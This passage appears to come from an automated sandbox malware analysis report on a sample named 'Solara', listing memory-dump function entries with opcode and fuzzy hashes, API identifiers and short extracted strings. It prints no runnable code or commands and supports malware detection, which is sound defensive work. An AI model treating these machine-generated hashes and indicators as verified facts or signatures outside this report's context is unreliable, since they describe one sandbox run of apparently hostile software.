                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "
                                                                                                                                      • API String ID: 0-123907689
                                                                                                                                      • Opcode ID: bf07c57c00d1ef3b7f88535b94f074363f082480f1c2b643159cc3dbc51979fc
                                                                                                                                      • Instruction ID: 9a7f138ab333bc59c9f14f5eb4f23d3369a7b87edc0b0af4b67c7495f8817cfc
                                                                                                                                      • Opcode Fuzzy Hash: bf07c57c00d1ef3b7f88535b94f074363f082480f1c2b643159cc3dbc51979fc
                                                                                                                                      • Instruction Fuzzy Hash: 6EE158B2B083215BD715CE24E88076BB7D5AB94304F8D852EEC9A87382E63CDD44C797
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: v=@R
                                                                                                                                      • API String ID: 0-918497602
                                                                                                                                      • Opcode ID: 22e58559bf179f218bdf042bb1f081b0cf1dfeede3b64f4e59e8d0a24c46f7fa
                                                                                                                                      • Instruction ID: 880176603848ab7b1e90caaa1aa9e2105f24979e0c2c4f41d2e8e55d92bb020e
                                                                                                                                      • Opcode Fuzzy Hash: 22e58559bf179f218bdf042bb1f081b0cf1dfeede3b64f4e59e8d0a24c46f7fa
                                                                                                                                      • Instruction Fuzzy Hash: C0D18EB49047409FD724EF39C586366BFB1AF02300F544A5EE8EA4F34AE334941A8BD6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "
                                                                                                                                      • API String ID: 0-123907689
                                                                                                                                      • Opcode ID: 7e98b4656ee7a597cc4d0ae5467a7c4b97e5a60aa5ade5d03bcc0f57a0d03316
                                                                                                                                      • Instruction ID: 8eea5f4350ae280fe8e911fa23a5e51286f6c133913e8e17d238895ea971573b
                                                                                                                                      • Opcode Fuzzy Hash: 7e98b4656ee7a597cc4d0ae5467a7c4b97e5a60aa5ade5d03bcc0f57a0d03316
                                                                                                                                      • Instruction Fuzzy Hash: 3271D8327187604BD7248E2DA88035BB7D6ABC6330F68972EE4B4CB3E1D679DC458749
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "
                                                                                                                                      • API String ID: 0-123907689
                                                                                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                      • Instruction ID: 96c1d4b580b2f1f4d4f4a67dd4d13a0544a0e3e12ebd0cc6c0ce5e6543fb9160
                                                                                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                      • Instruction Fuzzy Hash: 9571E632B083259BD714CE28E48431BB7E2ABC5710FA9852EEC9497351D379DC55878B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 389~
                                                                                                                                      • API String ID: 0-1352396282
                                                                                                                                      • Opcode ID: d800fa6720e3b0b88aa2adfc40572340e84a4771e132665fb142ab8bbe239f88
                                                                                                                                      • Instruction ID: 6870975c055752de0d67d56063524f0ac327e2c41d35e05c0d764e2364cd8a2c
                                                                                                                                      • Opcode Fuzzy Hash: d800fa6720e3b0b88aa2adfc40572340e84a4771e132665fb142ab8bbe239f88
                                                                                                                                      • Instruction Fuzzy Hash: FA5103326143016BD718CF29DC9566BB7D2EBC9324F28952EEA8987362D334DC40C79A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: C@
                                                                                                                                      • API String ID: 0-3964751785
                                                                                                                                      • Opcode ID: e04e908ed38f475ce19dab6128b6197d0fd39cf5821b70b78784042824ecd997
                                                                                                                                      • Instruction ID: 50cc35f14600aeb766201b0331b62055364186816cf513d9622f109cde498438
                                                                                                                                      • Opcode Fuzzy Hash: e04e908ed38f475ce19dab6128b6197d0fd39cf5821b70b78784042824ecd997
                                                                                                                                      • Instruction Fuzzy Hash: 86410472A1C3018BD318DF24DC9166BB7E2FFCA300F189A2DE4C5D7265D638C9068749
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Z
                                                                                                                                      • API String ID: 0-1505515367
                                                                                                                                      • Opcode ID: dac676fd14aff61784c12958abf25b30edfafd2c81a535338022d457bf5cdeea
                                                                                                                                      • Instruction ID: a30c3434eb78bae3259823695d98683277f711368950b8e2f16f5bea92b34a8b
                                                                                                                                      • Opcode Fuzzy Hash: dac676fd14aff61784c12958abf25b30edfafd2c81a535338022d457bf5cdeea
                                                                                                                                      • Instruction Fuzzy Hash: A421FB3560D7808BD309C739D5502ABBFE36BDE306F0886ADD0CA87745DA3CCA068756
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8cdd836b57597261624e13f4db03fde979dd871f42a36d7d91432a0a9c10a45c
                                                                                                                                      • Instruction ID: a76e721c3722a630d0fb4aad4034161d24e1394987668f03c6f9ea3122406491
                                                                                                                                      • Opcode Fuzzy Hash: 8cdd836b57597261624e13f4db03fde979dd871f42a36d7d91432a0a9c10a45c
                                                                                                                                      • Instruction Fuzzy Hash: CC22B272A087118BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7381D738B851CB47
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ffbdba40f33d874917f865a4caae92feadad974be30d531bc310c485360a08c4
                                                                                                                                      • Instruction ID: 70f9c8d33bed0a887bd04825a0d65e11373c21b69666ef710cc48ba24fc1fce8
                                                                                                                                      • Opcode Fuzzy Hash: ffbdba40f33d874917f865a4caae92feadad974be30d531bc310c485360a08c4
                                                                                                                                      • Instruction Fuzzy Hash: 38C15771B083015BD728DB25CC8162BF793EBC9314F29A52EF59597391DB38EC028799
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 59dc58f8b72f3261978d582eceea8e2fa17fcb4f2cc941d0ed30612a6001ea79
                                                                                                                                      • Instruction ID: a7592e11ca47ea3e46ea553e43cba76b6aa0764661e9ebcde4bfce418c791712
                                                                                                                                      • Opcode Fuzzy Hash: 59dc58f8b72f3261978d582eceea8e2fa17fcb4f2cc941d0ed30612a6001ea79
                                                                                                                                      • Instruction Fuzzy Hash: 5AF1DF356087418FD724CF29C88166BFBE2EFD9304F08882EE5D597391E679E844CB96
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9100b5eb5fb27d43c5cf651ed6efc702689b9e2ba8049f4dcd894fb35b88d4da
                                                                                                                                      • Instruction ID: c002e98aa9dacb960afd0755ca10f4a619db791b8d2d7ec894e175e901c6b24e
                                                                                                                                      • Opcode Fuzzy Hash: 9100b5eb5fb27d43c5cf651ed6efc702689b9e2ba8049f4dcd894fb35b88d4da
                                                                                                                                      • Instruction Fuzzy Hash: 6DC136B5E04226CFDB14CF64D8516AEB7B1FF86310F16826DD419AB381EB389941CB94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: ba08e9262857ed6bf6e116363f7c0704c5d9a7db77371a184cd88586c9e593f2
                                                                                                                                      • Instruction ID: 0d6705c080464e5604ad7cd4c3e8d1002dce67e3b26aca40692b810b8d578482
                                                                                                                                      • Opcode Fuzzy Hash: ba08e9262857ed6bf6e116363f7c0704c5d9a7db77371a184cd88586c9e593f2
                                                                                                                                      • Instruction Fuzzy Hash: F191E135A083119BCB25DF28C88192BB7E1FF99310F18A43DE9858B362D739EC54D796
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 10148aeaf7fa5ea12a9611c21b7724a301ec114a61df4b5040950761e2d17b04
                                                                                                                                      • Instruction ID: 8e9e712227cb5666b9137af00f971b3bed3be964946e431ff2faf8fe83471e7a
                                                                                                                                      • Opcode Fuzzy Hash: 10148aeaf7fa5ea12a9611c21b7724a301ec114a61df4b5040950761e2d17b04
                                                                                                                                      • Instruction Fuzzy Hash: FB81F1356043029BD7149F19D890A2BB3F2FF99710F15957DE8848B3A5EB34EC15CB8A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0fff0db5359ad6ff1b855b71272d9ab6e7fc408df289deaece49282d276e4125
                                                                                                                                      • Instruction ID: e9df0b7dd15ff3979cdd6b27a8beb2bdf3c8e34fd945e1d8eb657bb1d22554da
                                                                                                                                      • Opcode Fuzzy Hash: 0fff0db5359ad6ff1b855b71272d9ab6e7fc408df289deaece49282d276e4125
                                                                                                                                      • Instruction Fuzzy Hash: 54910670A0D3828BC325CE69C4D062ABBE1AFD9304F19C6BED4E55B342D639D845CB96
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 05285be5c1fafb21d3c14f3ee55ebf067695a70cff164a6653ec132e6bb213c2
                                                                                                                                      • Instruction ID: e9b12275dff7888e55b93fd00587a30dd41be6173a06044378c0c0ce21f89c70
                                                                                                                                      • Opcode Fuzzy Hash: 05285be5c1fafb21d3c14f3ee55ebf067695a70cff164a6653ec132e6bb213c2
                                                                                                                                      • Instruction Fuzzy Hash: 1D7112B16093408BC7149F28D89277BBBE1EF81314F94892DE4C58B391E779D904CB9A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f8878c1f1470f54cac091f7121d7a2120f9266abf6f39cd78c4b9d97e12e042e
                                                                                                                                      • Instruction ID: 13d8e2c369704eeb70ed035f42a0242f3ab0a554236198730144152ef38a701d
                                                                                                                                      • Opcode Fuzzy Hash: f8878c1f1470f54cac091f7121d7a2120f9266abf6f39cd78c4b9d97e12e042e
                                                                                                                                      • Instruction Fuzzy Hash: 3B512DB1C052528FD704CF69DC8166EBF61FB16314F049ABDD852BB3A3E6348842CB98
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ec2532a013675b52af9d00602fde89d1287a1df278891fc3a7fdea8734410de9
                                                                                                                                      • Instruction ID: 1907af8ec1c737c12018513b553f5bf06ff1f00c98905cbf1f5f66595908840a
                                                                                                                                      • Opcode Fuzzy Hash: ec2532a013675b52af9d00602fde89d1287a1df278891fc3a7fdea8734410de9
                                                                                                                                      • Instruction Fuzzy Hash: 7F6158759083915FC3258F29C880A6F7BE1AF95214F4882AEE8A44B392D635D845C756
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: feaa891308d020e5ce0f71e2df48ee853ad0e716dbbf68cff114dedfcf9adfa1
                                                                                                                                      • Instruction ID: 69b6b2ce86f869775d7dc0054b69922b096723557ea721dc1f71e405c3da1779
                                                                                                                                      • Opcode Fuzzy Hash: feaa891308d020e5ce0f71e2df48ee853ad0e716dbbf68cff114dedfcf9adfa1
                                                                                                                                      • Instruction Fuzzy Hash: E1510975B002099FDB18CF69D89277FB7B2FB89304F14542EE202A7391DB799901CB98
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c14744f61c5f1dec34170e514bdc839971fdef57b95ce3d3a615a8f97ede0782
                                                                                                                                      • Instruction ID: 588b2ae75d67dd2325b1d1a9b55dab356a866e3f9c658e9cc3efedf394fdaee3
                                                                                                                                      • Opcode Fuzzy Hash: c14744f61c5f1dec34170e514bdc839971fdef57b95ce3d3a615a8f97ede0782
                                                                                                                                      • Instruction Fuzzy Hash: 8D51F272714A108FC734CE38D8D1667B7E2ABC2314B59462ED8A6C7781EB38EC05C794
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 942edac727b3cffb8a3a1bf2111727ea21a4481219105a2551319d0277bebed9
                                                                                                                                      • Instruction ID: 3488b58ab431f448c01de3bf7053274778b5d81228bf343d50e2562b6d93fb69
                                                                                                                                      • Opcode Fuzzy Hash: 942edac727b3cffb8a3a1bf2111727ea21a4481219105a2551319d0277bebed9
                                                                                                                                      • Instruction Fuzzy Hash: 19412875A093918BD7168F2AE4A0733FBE1AF63301F781489E8D34B392D7799802C759
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 653b4213c78da6e4a12898239bd7186c559521fbb7a16f523599959ee456718e
                                                                                                                                      • Instruction ID: 16d1c463e5ae7e58bb22e6b9079cc9d65b17a6b17291596ce1f2c6bfd5b33dae
                                                                                                                                      • Opcode Fuzzy Hash: 653b4213c78da6e4a12898239bd7186c559521fbb7a16f523599959ee456718e
                                                                                                                                      • Instruction Fuzzy Hash: 7E315476A085219BD31CCB18E851A7BB363BBDA705F2A852EC58713225DA74BC42C7CD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 4c9e1dcc9c5ec8805a793cd23df2477e8129dd7adba1d4fd6028bd2d68dfc4f4
                                                                                                                                      • Instruction ID: bbc22fe31499e6f8eddcd88478dec0f026be5f50bb815333038ae186a23b3686
                                                                                                                                      • Opcode Fuzzy Hash: 4c9e1dcc9c5ec8805a793cd23df2477e8129dd7adba1d4fd6028bd2d68dfc4f4
                                                                                                                                      • Instruction Fuzzy Hash: 9A212C38B482109BD7084B59D8D153BB792EBD6324F58C53EE59263396C37CAC068B4D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                      • Instruction ID: eab81e75700f8a186743f4c1e43eda9669e3423d07df69c08b24b048c9e14ebe
                                                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                      • Instruction Fuzzy Hash: DF114C33A055D04EC31A9D3C8440565BFA30A97334F6D939AF4B49B2D2D6278D8B8369
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0447fffad7682d84063a170106a2012487eba73bf37923d7e35e7d801daf4790
                                                                                                                                      • Instruction ID: 74ba655dd8b0a69455f10271c13097c4cca2cf5dc5e72b68ed5b7a74393510e4
                                                                                                                                      • Opcode Fuzzy Hash: 0447fffad7682d84063a170106a2012487eba73bf37923d7e35e7d801daf4790
                                                                                                                                      • Instruction Fuzzy Hash: CA01B5F5F1031147D720BE51A8C0727B2A86F82708F0C453ED40957342DB7AFC05C2A9
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString
                                                                                                                                      • String ID: $"$$$$$&$)$.$/$0$0$2$2$4$6$8$9$:$:$<$>$>$E$H$L$M$N$O$R$R$W$^$c
                                                                                                                                      • API String ID: 2525500382-481378849
                                                                                                                                      • Opcode ID: 20647a8f96ad956c88b0e7d685b9b569d5f23a405f89cde09cca847cdfe91337
                                                                                                                                      • Instruction ID: 7cd05fba57e7d742c193bd2b2f916de33a36bbf6e152df55b640cd8785c30d01
                                                                                                                                      • Opcode Fuzzy Hash: 20647a8f96ad956c88b0e7d685b9b569d5f23a405f89cde09cca847cdfe91337
                                                                                                                                      • Instruction Fuzzy Hash: E691092110CBC189D332C63C885874FBED15BE7224F188B9DE1E98B3E6D6B5850AC767
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString
                                                                                                                                      • String ID: $"$$$$$&$)$.$/$0$0$2$2$4$6$8$9$:$:$<$>$>$E$H$L$M$N$O$R$R$W$^$c
                                                                                                                                      • API String ID: 2525500382-481378849
                                                                                                                                      • Opcode ID: 23a3269617f9770ecf5cc6e00383ab778b459d80473c22e4d163fe3dfae77031
                                                                                                                                      • Instruction ID: 4e6eab716204590b26222aaf83f04d75c561016eb26900b26d3c0d76e8c63749
                                                                                                                                      • Opcode Fuzzy Hash: 23a3269617f9770ecf5cc6e00383ab778b459d80473c22e4d163fe3dfae77031
                                                                                                                                      • Instruction Fuzzy Hash: 2D910C2150CBC189D332C63C894874FBED16BE7224F188B9DE1E89B3D2D6B58506C767
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                      • String ID: ($*$,$.$/$0$2$4$6$8$:$<$>$D
                                                                                                                                      • API String ID: 2610073882-574869987
                                                                                                                                      • Opcode ID: 6a9d9d6363f32a5cd3c7ebcb092db2a57f38bcf899637fb1440c41d8d17b5090
                                                                                                                                      • Instruction ID: f3fd106303cf8130f5d1fd3d036fd21114339d01a7ea6eeb0a4ee57b439430e0
                                                                                                                                      • Opcode Fuzzy Hash: 6a9d9d6363f32a5cd3c7ebcb092db2a57f38bcf899637fb1440c41d8d17b5090
                                                                                                                                      • Instruction Fuzzy Hash: 0141D43400C7C28AD326DB78855875EFFE16B97314F484A9DE1E44A3D6D3BA810ACB67
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
